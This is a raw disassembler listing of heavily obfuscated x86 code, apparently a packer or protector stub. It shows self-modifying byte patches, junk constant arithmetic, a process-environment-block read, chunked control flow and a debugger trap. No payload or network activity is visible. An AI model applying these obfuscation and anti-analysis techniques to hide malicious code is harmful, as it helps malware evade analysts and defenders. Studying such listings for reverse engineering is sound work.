mov eax, large fs:30h
push esi
push 0DED701A7h
xchg edi, [esp]
mov esi, edi
pop edi
jmp loc_48BD89
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_487FA1
loc_48B252: ; CODE XREF: sub_487FA1+1DB3j
jge loc_48BAAE
mov [ebp+0], edx
loc_48B25B: ; CODE XREF: sub_487FA1+445Ej
rol esi, 4
add esi, 65E1F7CAh
call sub_48997A
; END OF FUNCTION CHUNK FOR sub_487FA1
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B26B: ; CODE XREF: znnrn47v:0048879Fj
jmp locret_48A385
; ---------------------------------------------------------------------------
dd 0C5E90000h, 0C6FFFFE4h, 8B5AC302h, 0C35BEBh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48B280: ; CODE XREF: sub_48C14F-13E0j
jmp loc_48BBA5
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B287: ; CODE XREF: znnrn47v:00488DF6j
jmp loc_48C4B8
; ---------------------------------------------------------------------------
dd 0E4C9870Fh, 40E9FFFFh, 0FFFFEAh, 7BE9D633h
db 0D7h, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_599. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_48B2A1: ; CODE XREF: znnrn47v:00488C77j
jmp loc_48BBFB
; ---------------------------------------------------------------------------
dw 789h
dd 0FFD8EDE8h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_607. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_600. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_48B2B1: ; CODE XREF: znnrn47v:00489F19j
jmp loc_48B6AD
; ---------------------------------------------------------------------------
dw 0C100h
dd 0C1F704E1h, 2243ECD2h, 0E50E9h, 0F08B0000h, 0B8243487h
dd 48AA26h, 873E9h
db 0
; ---------------------------------------------------------------------------
loc_48B2D5: ; CODE XREF: znnrn47v:0048AA30j
lea eax, loc_48B10E
push edi
call sub_488549
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B2E3: ; CODE XREF: znnrn47v:0048995Fj
jmp near ptr loc_48AF8A+1
; ---------------------------------------------------------------------------
dd 588B00C6h, 48A1BA68h, 0FE13E900h, 8500FFFFh, 0CB4FE9F8h
dd 0C300FFFFh, 0FFD447E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4893CC
loc_48B305: ; CODE XREF: sub_4893CC+Cj
jmp loc_48A67A
; END OF FUNCTION CHUNK FOR sub_4893CC
; ---------------------------------------------------------------------------
loc_48B30A: ; CODE XREF: znnrn47v:00489150j
jmp loc_48B1B3
; ---------------------------------------------------------------------------
align 10h
dd 0DEADE900h, 0E900FFFFh, 0FFFFF21Fh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B31E: ; CODE XREF: znnrn47v:loc_48ABCFj
; znnrn47v:0048B3E0j
push 487DAAh
jmp near ptr dword_488BBC+9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48B328: ; CODE XREF: sub_48C14F:loc_4887CEj
call sub_4893CC
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488C5F
loc_48B32F: ; CODE XREF: sub_488C5F+Dj
jmp near ptr dword_487FFC+16h
; END OF FUNCTION CHUNK FOR sub_488C5F
; ---------------------------------------------------------------------------
dd 30058B64h, 53000000h, 1C87DE8Bh, 0B4AABE24h, 70E90048h
dd 87FFFFDDh, 15FF2414h, 45B0C0h, 0E9F08B56h, 0FFFFCB76h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48B35E proc near ; CODE XREF: sub_48AC88-D44p
; znnrn47v:0048AB06j
; FUNCTION CHUNK AT 0048A845 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048A850 SIZE 00000007 BYTES
xchg eax, [esp+0]
xchg esi, [esp+0]
mov eax, esi
pop esi
add edi, 71C212Ch
jmp loc_48A845
sub_48B35E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_48B374: ; CODE XREF: znnrn47v:0048B3CDj
sub ebp, edi
mov [ecx], edi
loc_48B378: ; CODE XREF: znnrn47v:loc_48B3C1j
and edi, 1BF9F1E6h
call near ptr dword_487DCC+87h
jmp near ptr dword_488854+2
; ---------------------------------------------------------------------------
and ebx, ebp
jmp loc_48D053
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
jmp loc_48B688
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFDAC7h
; =============== S U B R O U T I N E =======================================
sub_48B39C proc near ; CODE XREF: znnrn47v:00487AC4j
; sub_489CDA:loc_489712p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0048B831 SIZE 00000016 BYTES
xchg esi, [esp+0]
pop esi
mov byte ptr [esi], 8Bh
xchg ecx, [esp-4+arg_0]
mov esi, ecx
pop ecx
sub eax, 78C893E9h
jmp loc_48B831
sub_48B39C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_48B3B6: ; CODE XREF: sub_48D039:loc_48A528j
push esi
push ebp
pop esi
xchg esi, [esp+0]
jmp loc_489834
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
loc_48B3C1: ; CODE XREF: znnrn47v:loc_48CD52j
jz loc_48B378
sub ebx, edx
mov ebx, esi
adc edi, eax
jmp loc_48B374
; ---------------------------------------------------------------------------
db 0
byte_48B3D3 db 87h ; DATA XREF: sub_488F90o
dd 35F243Ch, 0C87E8C3h, 0
; ---------------------------------------------------------------------------
jmp loc_48B31E
; ---------------------------------------------------------------------------
align 2
word_48B3E6 dw 5356h ; DATA XREF: sub_48997A+7o
dd 48C21FBBh, 0E510E900h, 5600FFFFh, 58097868h, 0F6815E0Fh
dd 3411E383h, 4E5EE81h, 59E9A881h, 0FFFFEFh
db 0
; ---------------------------------------------------------------------------
locret_48B40D: ; CODE XREF: znnrn47v:loc_48D077j
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B40F: ; CODE XREF: znnrn47v:0048BC0Dj
jmp loc_48B5AE
; ---------------------------------------------------------------------------
dd 59E90000h, 1Ch
; =============== S U B R O U T I N E =======================================
sub_48B41C proc near ; DATA XREF: znnrn47v:00489D2Ao
; FUNCTION CHUNK AT 0048C0F3 SIZE 00000020 BYTES
push ebx
push 43CFEEE3h
pop ebx
jmp loc_48C0F3
sub_48B41C endp
; ---------------------------------------------------------------------------
dd 0C30000h, 87241C87h, 0DA8B2414h, 27C0815Ah, 55DD01B2h
dd 46E95D50h, 0C3FFFFCBh, 0E03DE900h, 6800FFFFh, 488C72h
dd 0FFD81CE9h, 9DE81FFh, 0E917C6D3h, 4B5h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B462: ; CODE XREF: znnrn47v:loc_48AB77j
call sub_48C8B3
add cl, ch
cdq
iret
; ---------------------------------------------------------------------------
db 0FFh
dd 0F8B00FFh, 5A241487h, 6841C281h, 27E9D593h, 0FFFFCDh
db 0
; ---------------------------------------------------------------------------
loc_48B481: ; CODE XREF: znnrn47v:loc_488EBAj
or eax, eax
jz loc_488D01
push edi
mov edi, ecx
xchg edi, [esp]
push 0FBEA41DEh
pop ecx
call sub_48B52C
xchg ecx, [esp]
pop ecx
add eax, 0A217B070h
add eax, 5DE84F9Ch
mov eax, [eax]
jmp loc_48B5BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488D12
loc_48B4B1: ; CODE XREF: sub_488D12+15j
add edi, 998DCBE4h
push offset sub_48A5BC
jmp nullsub_575
; END OF FUNCTION CHUNK FOR sub_488D12
; ---------------------------------------------------------------------------
db 87h, 0D5h, 0E9h
dd 0FFFFD655h, 0ABF88100h, 0E948A41Eh, 0FFFFEA4Bh, 34870000h
dd 108B5E24h, 8704C083h, 0D2092404h, 0FFE8C0E9h, 41EA81FFh
dd 0E9770759h, 0FFFFF5EBh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_48B4F6: ; CODE XREF: sub_48B1BE:loc_488385j
xchg ecx, [esp+0]
mov edi, ecx
pop ecx
pushf
push 0FB1CDC50h
pop eax
xor eax, 0CBEE6B5Ah
or eax, 0CF1AC46Ch
jmp loc_488CA1
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
xchg esi, [esp]
pop esi
xchg ecx, [esp]
push offset loc_48A68E
jmp loc_48C6BA
; ---------------------------------------------------------------------------
align 2
jbe loc_48AEE1
; =============== S U B R O U T I N E =======================================
sub_48B52C proc near ; CODE XREF: znnrn47v:0048B495p
; FUNCTION CHUNK AT 004894FC SIZE 0000000A BYTES
xchg eax, [esp+0]
xchg edx, [esp+0]
mov eax, edx
pop edx
push ebx
mov ebx, offset loc_48B618
jmp loc_4894FC
sub_48B52C endp
; ---------------------------------------------------------------------------
dd 8D0F0000h, 3B6h, 0D1EDCD81h, 98E95479h, 0FFFFD8h
dword_48B554 dd 0B1DC681h, 6891ADDh, 2414D35Eh, 315A5952h, 0E5A3E9C0h
; DATA XREF: sub_48A5BC+C7o
dd 0FFFFh, 9D004589h, 0DC63E99Ch, 9C52FFFFh, 97C5A68h
dd 0CA815A88h, 862F8D35h, 6920EA81h, 0C2813D4Dh, 0C1771173h
dd 0FFF413E9h, 8C0F00FFh, 0FFFFF993h
; ---------------------------------------------------------------------------
loc_48B59C: ; CODE XREF: znnrn47v:0048A128j
jmp near ptr dword_489DB4+20h
; ---------------------------------------------------------------------------
align 2
dw 0C3F7h
dd 0CD884FD6h, 0FFCDAEE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_48B5AE: ; CODE XREF: znnrn47v:loc_48B40Fj
xchg edi, [esp]
jmp loc_48B5CA
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
loc_48B5B9: ; CODE XREF: znnrn47v:0048CB0Cj
jmp loc_48B943
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B5BF: ; CODE XREF: znnrn47v:0048B4ACj
jmp loc_48B79B
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B5C5: ; CODE XREF: znnrn47v:0048AF24j
jmp loc_48A037
; ---------------------------------------------------------------------------
loc_48B5CA: ; CODE XREF: znnrn47v:0048B5B1j
call near ptr byte_48AF9F
; ---------------------------------------------------------------------------
db 0
dd 0F126E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48B5D6: ; CODE XREF: znnrn47v:00488D0Dj
jmp loc_4891BC
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
locret_48B5DD: ; CODE XREF: znnrn47v:loc_48AE54j
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B5DF: ; CODE XREF: znnrn47v:0048A1AAj
push offset loc_48ADA8
jmp locret_48B085
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_582. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_48B5EC proc near ; CODE XREF: znnrn47v:00489573j
; FUNCTION CHUNK AT 0048CEB3 SIZE 00000005 BYTES
xchg ebx, [esp+0]
xchg ecx, [esp+0]
mov ebx, ecx
pop ecx
mov byte ptr [ecx], 87h
pop ecx
add eax, 0F5C89596h
push offset byte_48AE3F
jmp loc_48CEB3
sub_48B5EC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 5Fh
; ---------------------------------------------------------------------------
sub edi, 0B8531AA3h
add edi, 0B0F9D9A4h
loc_48B618: ; DATA XREF: sub_48B52C+Ao
mov ch, 0FDh
add edi, 4102DC41h
mov edi, [edi]
xchg edi, [esp]
jmp loc_48C595
; ---------------------------------------------------------------------------
dw 8B57h
dd 243C87F8h, 48C90AB8h, 0E79CE900h, 0FFFFh
; =============== S U B R O U T I N E =======================================
sub_48B63C proc near ; CODE XREF: znnrn47v:00489951p
xchg esi, [esp+0]
pop esi
mov ds:byte_488BBA, 0Fh
mov byte ptr ds:dword_487ACC+0E5h, 0Fh
retn
sub_48B63C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C11B
loc_48B64F: ; CODE XREF: sub_48C11B:loc_48BDD9j
mov byte ptr [esi], 3
pop esi
xchg edi, [esp-4+arg_0]
push ecx
jmp loc_4895B3
; END OF FUNCTION CHUNK FOR sub_48C11B
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B65E: ; CODE XREF: znnrn47v:0048AD13j
mov byte ptr [ecx], 49h
xchg ebp, [esp]
mov ecx, ebp
pop ebp
xor edx, eax
loc_48B669: ; DATA XREF: znnrn47v:0048AD0Eo
dec ecx
jnz near ptr dword_4897B4+36h
pop ecx
jmp loc_48995A
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_48B677 proc near ; CODE XREF: sub_488955:loc_48C63Fp
; FUNCTION CHUNK AT 004880B6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048884A SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg ebx, [esp+0]
mov edi, ebx
pop ebx
pop edi
jmp loc_48884A
sub_48B677 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_48B688: ; CODE XREF: znnrn47v:0048B391j
push 48A2ACh
jmp near ptr dword_48A2A4+1
; ---------------------------------------------------------------------------
align 4
dd 8B243C87h, 0AE685FCFh, 0E9004892h, 0FFFFD643h, 0E9D3F700h
dd 0FFFFECFBh
db 0
; ---------------------------------------------------------------------------
loc_48B6AD: ; CODE XREF: znnrn47v:loc_48B2B1j
and edi, 0E06F6B9Dh
add edi, 2FC123F7h
add edi, ebp
add edi, 6FD77258h
mov edi, [edi]
xchg edi, [esp]
push offset dword_48C7DC
jmp loc_48CEAC
; ---------------------------------------------------------------------------
loc_48B6D0: ; CODE XREF: znnrn47v:0048B1D1p
xchg edx, [esp]
pop edx
add edi, 0BAAD793Dh
call loc_48BAF1
add cl, ch ; CODE XREF: sub_48CA24-122Ej
mov bh, 7
; ---------------------------------------------------------------------------
db 0
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_616. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_48B6E8 proc near ; CODE XREF: znnrn47v:00489AE4p
; znnrn47v:0048B00Aj
; FUNCTION CHUNK AT 0048A425 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A809 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048B7DD SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
add eax, ebp
add eax, 46351088h
push edi
mov edi, offset loc_48A80E
jmp loc_48A425
sub_48B6E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add esi, ebx
jmp sub_487DC2
; ---------------------------------------------------------------------------
dw 9D00h
; ---------------------------------------------------------------------------
jmp loc_48C38A
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B70F: ; CODE XREF: znnrn47v:loc_48BA04j
xchg ecx, [esp]
mov edi, ecx
pop ecx
xchg esi, [esp]
push esi
mov esi, offset nullsub_603
jmp loc_48AB2A
; ---------------------------------------------------------------------------
align 4
loc_48B724: ; CODE XREF: znnrn47v:0048AE2Dj
jl loc_489B2A
add eax, 7A8ECEE8h
push offset loc_48CBF5
jmp locret_48CA14
; ---------------------------------------------------------------------------
align 4
loc_48B73C: ; DATA XREF: znnrn47v:0048AF5Bo
push ecx
push 1FABE796h
pop ecx
or ecx, 0F80BADE5h
rol ecx, 10h
and ecx, 42DF8C78h
call sub_48B8DD
; START OF FUNCTION CHUNK FOR sub_48961B
loc_48B757: ; CODE XREF: sub_48961B+Ej
and edx, 0DA8F5BD1h
push 487B0Ch
jmp nullsub_572
; END OF FUNCTION CHUNK FOR sub_48961B
; ---------------------------------------------------------------------------
align 4
loc_48B768: ; CODE XREF: znnrn47v:00489308j
and eax, 30E04E05h
jmp near ptr dword_487ACC+99h
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_48B774: ; CODE XREF: sub_48C14F:loc_48AC6Cj
xor edx, 55921055h
push offset byte_489819
jmp nullsub_619
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
dd 0E9990000h, 693h, 68008B59h, 48BF46h, 63FE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_48B79B: ; CODE XREF: znnrn47v:loc_48B5BFj
push 488572h
jmp near ptr dword_487ACC+3Eh
; ---------------------------------------------------------------------------
align 2
loc_48B7A6: ; CODE XREF: znnrn47v:0048C8F0j
xchg esi, [esp]
pop esi
mov byte ptr [eax], 0C3h
push ebx
jmp loc_48CAD5
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
loc_48B7B5: ; CODE XREF: znnrn47v:00488795j
mov edi, offset dword_48BBC8
jmp loc_48A41E
; ---------------------------------------------------------------------------
cdq
; =============== S U B R O U T I N E =======================================
sub_48B7C0 proc near
; FUNCTION CHUNK AT 0048C411 SIZE 00000003 BYTES
xchg edi, [esp+0]
pop edi
push 349C9B43h
pop esi
jmp loc_48C411
sub_48B7C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor eax, ecx
xchg esi, [esp]
pop esi
mov edx, [eax]
jmp loc_48CCF7
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B6E8
loc_48B7DD: ; CODE XREF: sub_48B6E8-ED4j
push offset loc_488A03
jmp nullsub_568
; END OF FUNCTION CHUNK FOR sub_48B6E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48CA24
loc_48B7E8: ; CODE XREF: sub_48CA24:loc_48B949j
or eax, eax
jz loc_48CE0B
push edi
push offset loc_48BE9E
jmp near ptr loc_48B6DF+1
; END OF FUNCTION CHUNK FOR sub_48CA24
; ---------------------------------------------------------------------------
align 4
mov esi, edx
xchg esi, [esp]
push ecx
pop edx
xchg edx, [esp]
jmp loc_48C742
; ---------------------------------------------------------------------------
align 4
mov ebx, offset byte_48BB5F
jmp loc_48AE1E
; ---------------------------------------------------------------------------
align 4
dd 87D88B53h, 39B8241Ch, 0E90048BDh, 0FFFFD22Bh, 5EE9F913h
dd 0Fh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B39C
loc_48B831: ; CODE XREF: sub_48B39C+13j
add eax, 3E63F67Bh
sub eax, 0D1729CEDh
push offset loc_48AC9C
jmp nullsub_583
; END OF FUNCTION CHUNK FOR sub_48B39C
; ---------------------------------------------------------------------------
align 4
dd 58F6400h, 0
dd 0FFEB39E8h, 2B0000FFh, 768E0FC5h, 81FFFFEAh, 9EFF2AD6h
dd 81188956h, 0F8CFCEEAh, 1720E829h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BD79
loc_48B874: ; CODE XREF: sub_48BD79+Bj
jmp loc_48B0BC
; END OF FUNCTION CHUNK FOR sub_48BD79
; ---------------------------------------------------------------------------
push 7B4CCEF9h
pop esi
xor esi, 0C85C74D0h
and esi, 59C5632Eh
or esi, 85AABBE8h
test esi, 400h
jmp loc_48B931
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48B89E: ; DATA XREF: znnrn47v:00488D5Do
push 79EF0B28h
xchg edi, [esp]
mov eax, edi
pop edi
xor eax, 1ED5C689h
jmp loc_48C3D4
; ---------------------------------------------------------------------------
loc_48B8B4: ; DATA XREF: znnrn47v:0048BFCCo
xchg ebp, [esp]
mov ebx, ebp
pop ebp
rol ebx, 2
add ebx, 83E9D79Eh
and ebx, 56915DAEh
or ebx, 75F8F8E2h
add ebx, 8A4F818Fh
jmp loc_48C181
; ---------------------------------------------------------------------------
dw 8B00h
db 0C8h
; =============== S U B R O U T I N E =======================================
sub_48B8DD proc near ; CODE XREF: znnrn47v:0048B752p
; FUNCTION CHUNK AT 0048A85F SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xor ecx, 8448E08h
add ecx, ebp
jmp loc_48A85F
sub_48B8DD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
loc_48B8F0: ; CODE XREF: znnrn47v:0048970Dj
add edx, 0BFE1736Bh
add edx, ebp
call sub_48B91B
loc_48B8FD: ; DATA XREF: znnrn47v:00489EACo
add [ecx+68h], dl
push 10h
int 3 ; Trap to Debugger
test [ecx-3Fh], ebx
rcr dword ptr ds:0FE20F181h, 5
jnp short near ptr word_48B912
shr ecx, 77h
; ---------------------------------------------------------------------------
word_48B912 dw 0FFFEh ; CODE XREF: znnrn47v:0048B90Dj
dd 7B840FFFh
db 0D7h, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_48B91B proc near ; CODE XREF: znnrn47v:0048B8F8p
xchg ebx, [esp+0]
pop ebx
add edx, 0FFF84DDh
call sub_48920C
loc_48B92A: ; CODE XREF: znnrn47v:0048BEE7j
jmp nullsub_602
sub_48B91B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_48B931: ; CODE XREF: znnrn47v:0048B897j
jz near ptr dword_489E40+2
test ebx, 0AB3E2E41h
jmp near ptr dword_48AD18+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48B943: ; CODE XREF: znnrn47v:loc_48B5B9j
call near ptr dword_48ABDC+4
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48CA24
loc_48B949: ; CODE XREF: sub_48CA24+8j
jmp loc_48B7E8
; END OF FUNCTION CHUNK FOR sub_48CA24
; ---------------------------------------------------------------------------
align 10h
mov byte ptr [eax], 83h
pop eax
push 48A7EEh
jmp loc_48A771
; ---------------------------------------------------------------------------
loc_48B95E: ; CODE XREF: znnrn47v:00487D8Aj
jz loc_489ADB
add [edi+0Bh], bl
fsubr st, st(1)
insb
loope near ptr loc_48B96A+1 ; CODE XREF: znnrn47v:loc_48B96Aj
inc dword ptr [eax]
xor edi, 1B311884h
add eax, edi
pop edi
xchg eax, [esp]
jmp loc_48BC36
; ---------------------------------------------------------------------------
align 10h
db 0
; ---------------------------------------------------------------------------
loc_48B981: ; CODE XREF: znnrn47v:loc_48AFE6j
jge near ptr byte_4885C1+2
; ---------------------------------------------------------------------------
db 0
db 0
; ---------------------------------------------------------------------------
loc_48B989: ; CODE XREF: znnrn47v:0048CACEj
jmp loc_48CB5B
; ---------------------------------------------------------------------------
loc_48B98E: ; CODE XREF: znnrn47v:00489CC0j
jmp near ptr dword_487D90+2
; ---------------------------------------------------------------------------
align 4
dd 0E7C8E900h, 0FFFFh, 7E5AC2F7h, 7BE99310h, 0C1FFFFCCh
dd 51E91AC9h, 8100000Fh, 79E481F3h, 79EE9E0h, 0
dword_48B9BC dd 4044F781h, 77E80850h, 0Fh, 9B8E0F00h, 0FFFFFEDh, 0FFEF178Ch
; DATA XREF: znnrn47v:loc_48C044o
dd 0EB67E9FFh
db 2 dup(0FFh), 0
; =============== S U B R O U T I N E =======================================
sub_48B9DB proc near ; CODE XREF: sub_48A5BC+2Ap
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004886F2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00488F2E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048AE34 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push 0BD0884F3h
pop edi
or edi, 0F005523h
and edi, 88BF54F4h
add edi, 78403209h
popf
jmp loc_4886F2
sub_48B9DB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_48B9FD: ; CODE XREF: znnrn47v:0048AF60j
retn
; ---------------------------------------------------------------------------
dw 0E900h
dd 11A6h
; ---------------------------------------------------------------------------
loc_48BA04: ; CODE XREF: znnrn47v:0048990Ej
jmp loc_48B70F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C93E
loc_48BA0B: ; CODE XREF: sub_48C93E-C7Aj
popf
jmp loc_488A3D
; END OF FUNCTION CHUNK FOR sub_48C93E
; ---------------------------------------------------------------------------
align 2
dw 0EE8Bh
dd 0FFCFB0E9h, 0E99900FFh, 1244h, 5EC3F700h, 0E9023DDDh
dd 0F35h, 54810F00h, 0E9FFFFDAh, 0FFFFE856h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488669
loc_48BA39: ; CODE XREF: sub_488669+1359j
push offset dword_48ACF4
jmp loc_48D06D
; END OF FUNCTION CHUNK FOR sub_488669
; ---------------------------------------------------------------------------
align 4
dd 489E6868h, 0F2BAE900h, 0FFFFh
dword_48BA50 dd 2C6EA268h, 0E7815F25h, 1EC80603h, 0C1DDCF81h, 0E9504065h
; DATA XREF: sub_48C8B3-5BEo
dd 0FFFFD35Ah, 7C60000h, 0E8815F9Ch, 92CB0054h, 8118C0C1h
dd 3F945EF8h, 0E905E91Eh
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C11B
loc_48BA83: ; CODE XREF: sub_48C11B:loc_4895B3j
call sub_489C50
; END OF FUNCTION CHUNK FOR sub_48C11B
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487FA1
loc_48BA89: ; CODE XREF: sub_487FA1+3B12j
jmp nullsub_569
; END OF FUNCTION CHUNK FOR sub_487FA1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48BA8F: ; CODE XREF: znnrn47v:0048A872j
jmp near ptr dword_4885F0+1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489E18
loc_48BA94: ; CODE XREF: sub_489E18+Dj
jmp nullsub_605
; END OF FUNCTION CHUNK FOR sub_489E18
; ---------------------------------------------------------------------------
db 2 dup(0), 0Bh
dd 0D6CE9E8h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48BAA2: ; CODE XREF: znnrn47v:00489201j
ja loc_48977A
xchg esi, [esp]
pop esi
mov esp, ebp
; START OF FUNCTION CHUNK FOR sub_487FA1
loc_48BAAE: ; CODE XREF: sub_487FA1:loc_48B252j
push offset byte_48CDD7
jmp loc_48BA89
; END OF FUNCTION CHUNK FOR sub_487FA1
; ---------------------------------------------------------------------------
dd 240C8700h, 0A3696859h, 0E9583115h, 0FFFFE096h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_48BACA proc near ; CODE XREF: znnrn47v:loc_48CC95p
; FUNCTION CHUNK AT 00488A9B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0048B155 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BBCD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C547 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
mov byte ptr [esi], 9Ch
pop esi
push edi
jmp loc_48BBCD
sub_48BACA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0A4783168h, 0BA525BFBh, 48C14Ch, 0FFD7B4E9h
db 0FFh
; ---------------------------------------------------------------------------
locret_48BAE9: ; CODE XREF: znnrn47v:loc_48ADCEj
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48930E
loc_48BAEC: ; CODE XREF: sub_48930E+985j
jmp loc_4885FD
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
loc_48BAF1: ; CODE XREF: znnrn47v:0048B6DAp
xchg ebx, [esp]
loc_48BAF4: ; CODE XREF: znnrn47v:00489765j
pop ebx
mov edi, [edi]
call sub_48C11B
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A541
loc_48BAFD: ; CODE XREF: sub_48A541-21Aj
jmp nullsub_577
; END OF FUNCTION CHUNK FOR sub_48A541
; ---------------------------------------------------------------------------
dw 0D58Bh
dd 43F2815Dh, 0F7A695A7h, 10000C2h, 0DBE0E900h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_48BB16: ; CODE XREF: znnrn47v:0048C8ACj
; DATA XREF: znnrn47v:0048D02Co
push cs
les eax, [eax+ebp*2]
sbb [ecx-7EA7412Ch], ebx
call near ptr 0B7A68D05h
jmp loc_48AE5A
; ---------------------------------------------------------------------------
align 4
add edx, 4845A053h
add edx, eax
add edx, 8A5561D5h
mov dword ptr [edx], 1000h
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 9E2h, 0FFF79BE9h, 0C9DE9FFh, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_591. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, offset loc_48CF0A
jmp loc_488CE0
; ---------------------------------------------------------------------------
byte_48BB5F db 0FFh ; DATA XREF: znnrn47v:0048B80Co
